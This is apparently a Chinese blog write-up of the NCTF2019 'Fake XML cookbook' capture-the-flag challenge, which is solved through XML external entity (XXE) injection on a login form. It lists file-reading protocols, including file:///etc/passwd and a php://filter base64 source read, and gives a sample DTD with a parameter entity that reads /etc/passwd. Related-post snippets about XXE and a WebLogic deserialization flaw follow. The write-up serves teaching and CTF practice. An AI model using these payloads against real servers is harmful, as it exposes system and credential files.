XXE漏洞 [NCTF2019]Fake XML cookbook1

已于 2023-12-17 21:01:12 修改
阅读量475 收藏 10
点赞数 6
文章标签: xml
于 2023-12-17 17:03:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/135045639
版权

打开题目

查看源代码

发现我们post传入的数据都被放到了doLogin.php下面

访问一下看看

提示加载外部xml实体

我们知道外部xml实体的格式是

<!ENTITY 实体名称 SYSTEM "URI/URL">

bp抓包一下看看

得到flag

或者这样

但是很明显这样是不行的,因为资源是在admin上,也就是用户名那里

PHP引用外部实体,常见的利用协议
file://文件绝对路径

如:

file:///etc/passwd

http://url/file.txt

php://filter/read=convert.base64-encode/resource=xxx.php

参数实体+外部实体

<!ENTITY % 实体名称 SYSTEM "URI/URL">

参数实体+外部实体

示例代码:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "file:///etc/passwd">

%file;

]>

%file(参数实体)是在DTD中被引用的,而&file;是在xml文档中被引用的。

最简单的xxe注入

 知识点源于:XML注入攻击总结_xml攻击-CSDN博客

从XML相关一步一步到XXE漏洞 - 先知社区

访白鹿
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip】 得到ip后,可以使用burpsuite进行目录爬取,得到sitemap后就可以对相应可疑站点进行测试,由于该靶场为xxe漏洞靶场,找到对应的登录页面抓包进行构造payload进行测试,其中具体构造payload并找到对应flag见pdf所示。 资源使用人群:前后端有一定了解,具备一些安全方面知识,但不多,保姆级教程,只要你想学就能学会。 工具:忍者渗透测试系统【burpsuite,nmap,base32解密,php在线运行环境,base64解密,cmd5在线平台】
NCTF2019 Fake XML cookbook
Tajang的大千世界
02-09 157
发现使用XML存储username和password。将内容发送至Repeater,然后写入恶意实体,注意这里是使用file://协议读取flag文件,并且将这个文件赋给admin。后面的admin前有&的意思是读取admin。所以这里会读取flag文件。蒙了几个username和password都显示错误,看来没有太多提示了。既然题目提示了XML那就百度一波。已知晓XML存在实体注入,引入实体文件,然后读取它就完成注入了。得出flag,感觉挺顺利的,第一次遇见xml实体注入,或者叫XXE攻击。
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解)
小宇的web博客
02-18 4215
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解) 这里先看题 乍一看像是sql注入,但是题目提示了是xml,这里就不考虑sql注入了。 先抓包看一下 这里的X-Requested-With提示了XML 然后发送到了doLogin.php 这里先讲一下XML的相关知识 XXE的危害和SSRF的有点像 XXE=>XML外部实体注入(被各种后端脚本调用) XML=>像html,html的目的是显示数据,但是xml的目的是传输数据,他没有预定义,他是纯文本,他是不会
[NCTF2019]Fake XML cookbook
weixin_55710577的博客
06-23 1686
[NCTF2019]Fake XML cookbook
记[NCTF2019]Fake XML cookbook 关于XXE攻击的思考
fly夏天的博客
03-04 322
看标题,提示是一个XML利用类型的题目。 打开网站,发现只有一个登录框 经过扫描等一些测试无果后,我们再回到标题提到的XML上。通过抓包我们可以发现一些东西 回显为: 这里表单提交的数据类型为XML,因此我们可以尝试XXE攻击。详细的讲解可以参考这篇文章。https://www.freebuf.com/vuls/175451.html 该请求会返回用户名 注:XXEXML外部实体)攻击,攻击者可以恶意构造一点XML表单来达到攻击的目的。 XML可以通过一些外部实体来执行一些命令。常见的有下面这些。
105-web漏洞挖掘之XXE漏洞1
08-03
1. 示例中是一般实体引用(即“&[name] 2. 示例中若使用FILE等其他协议,不一定是发起网络请求(源代码中定义的方法名 3. 不同的编程语言和XML
SCAN_XXE:利用XML XXE漏洞
05-07
SCAN_XXE 利用XML XXE漏洞
mvn package includes all the dependency jar in pom.xml
lianghyan的专栏
05-09 492
<plugin><goals></goals><archive><manifest></archive></plugin>
XMl发展前景及相关领域
wsl3465205046的博客
05-11 364
随着互联网和信息技术的不断发展,XML将继续发挥其重要的作用,为数据交换、系统集成和数据处理等领域提供解决方案。数据交换和存储:XML提供了一种通用的数据格式,可以用于在不同系统之间交换数据,同时也可以作为一种存储数据的格式。数据分析和处理:XML提供了一种结构化的数据表示方式,可以用于数据的分析和处理。通过使用XML,可以更方便地进行数据的查询、过滤和转换等操作,提升数据处理的效率和灵活性。数据标准化和集成:XML可以用于定义和描述数据的结构和格式,使得不同系统之间可以更易于集成和共享数据。
android xml 定义渐变色背景
dengfuma的专栏
05-11 289
android xml 定义渐变色背景
XML元素
wsl3465205046的博客
05-11 187
【代码】XML元素。
XML标记语言
wsl3465205046的博客
05-11 200
它是一种通用的框架,可以用来设计和实现各种不同的标记语言,如HTML、XML和SGML。通用标记语言的一个重要特点是它的可扩展性,可以通过添加新的元素和属性来扩展标记语言的功能和表达能力。XML使用自定义的标记来组织和嵌套数据,这些标记以尖括号(< >)包围,并且可以使用属性来提供关于数据的其他信息。它使用特定的标记标签来包围和标识文本中的元素,从而使计算机能够理解和解释这些元素的含义。它不是一种具体的数据格式,而是一种用于定义其他数据格式的元语言,也就是说,它可以用来定义各种各样的数据格式。
Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)
weixin_45653478的博客
05-13 737
CVE-2017-10271 是一个存在于 Oracle WebLogic Server 10.3.6 以下版本中的 XMLDecoder 反序列化漏洞。此漏洞源于 WebLogic 的 WLS-WebServices 核心组件,该组件使用 XMLDecoder 来解析用户传入的 XML 数据。由于 XMLDecoder 在处理某些特定格式的 XML 数据时存在反序列化漏洞,攻击者可以构造恶意的 XML 数据来触发该漏洞,从而执行任意命令,获取服务器权限。
为什么谷歌浏览器插件中不能使用xmlhttprequest(axios)
qq_42044542的博客
05-07 314
为什么按照Chrome Extension官方说明,在MV3中,由于Service Workers的机制,background pages中不支持XMLHttpRequest
<sa8650>QCX Usecase 使用详解—拓扑图 XML 定义
qq_39257814的博客
05-11 161
硬件和软件图像处理节点需要产生输出,而这些节点之间的连接决定了数据如何在摄像机子系统中流动。这组节点和连接称为拓扑结构。一个用例由一组要处理的目标和一组进一步定义数据处理方式的持续设置来定义。每个用例都由拓扑结构表示,拓扑结构是传递到 HAL3 API 的信息与如何处理数据的具体定义之间的连接。用例及其相应的拓扑结构都编码在一个 XML 文件中。在 configure_streams()过程中,会根据 XML 中的 和 部分选择用例。
从头开始学Spring—02基于XML管理bean
最新发布
青春无问西东 岁月自成芳华
05-13 616
Spring系列02部分——基于XML管理bean
部署xwiki服务需要配置 hibernate.cfg.xml如何配置?
舒一笑的博客
05-10 441
在 Tomcat 重新启动后,您可以检查 XWiki 是否能够成功连接到数据库。文件中,您需要配置数据库连接字符串、用户名、密码等信息。如果文件存在,您可以继续编辑它。如果不存在,请检查是否在其他位置或是否需要从模板文件复制一份。确保以上设置中的数据库 URL、用户名和密码与您的实际配置相匹配。首先,确保您可以在 Tomcat 的 XWiki 部署目录中找到。搜索任何与数据库连接相关的错误或异常,确保配置正确且有效。为您的 PostgreSQL 实例的实际参数。
geoserver xxe漏洞
09-02
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXEXML外部实体)漏洞XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修复已知的漏洞,并在新版本中发布修复程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值